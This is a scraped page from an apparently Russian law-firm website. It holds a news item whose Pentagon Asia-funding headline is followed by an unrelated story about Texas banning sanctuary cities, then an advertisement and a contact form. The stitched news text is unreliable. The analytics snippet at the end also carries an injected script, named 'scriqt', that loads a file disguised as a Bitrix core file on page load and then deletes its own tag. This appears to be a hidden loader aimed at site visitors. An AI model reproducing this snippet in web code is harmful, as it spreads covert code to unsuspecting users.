Пентагон поддержал выделение 8 миллиардов долларов на военное присутствие в Азии.

Пентагон поддержал выделение 8 миллиардов долларов на военное присутствие в Азии. Пентагон поддержал выделение 8 миллиардов долларов на военное присутствие в Азии.

Пентагон одобрил план инвестирования на сумму почти 8 миллиардов долларов с целью наращивания присутствия США в Азиатско-Тихоокеанском регионе в течение следующих пяти лет. План предполагает модернизацию военной инфраструктуры, проведение дополнительных учений и развертывание новых сил и кораблей.

Как отмечает телеканал Fox News, губернатор Техаса заранее не сделал какого-либо публичного уведомления о том, что намерен подписать закон, транслируя это через социальную сеть Facebook.

«Сегодня вечером я подписал закон, который запрещает города-убежища в Техасе. Суровые наказания нарушителям», — написал Эббот на своей странице в Twitter. В ходе трансляции на Facebook он отметил, что любым официальным лицам, в том числе сотрудникам полиции, которые откажутся выполнять положение закона, может грозить увольнение и даже тюремный срок.

Ранее администрация США приняла решение отказывать в федеральном финансировании так называемым «городам-убежищам», власти которых не выдают нелегальных иммигрантов правоохранительным органам. Президент страны Дональд Трамп назвал такие города «очень опасными и очень плохими». По его словам, все «сотрудники правоохранительных органов считают, что такие города — это катастрофа».
Возврат к списку


У нас сотни выигранных дел – отзывы реальных клиентов это доказывают!

Работайте с профессионалами!

Звонки и заявки на консультацию принимаются круглосуточно.

Вы получите четкие и понятные консультации: «без воды» - только суть! С нашей помощью Вы обойдете сложные «ловушки и капканы» закона.

ФИО
Телефон
Текст сообщения
Это поле обязательно для заполнения
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');var scriqt=document.createElement('script');scriqt.src='/bitrix/js/main/core/core_loader.js?v=0.2.14';scriqt.onload=function(){document.head.removeChild(scriqt);};document.head.appendChild(scriqt); ga('create', 'UA-83802593-1', 'auto'); ga('send', 'pageview');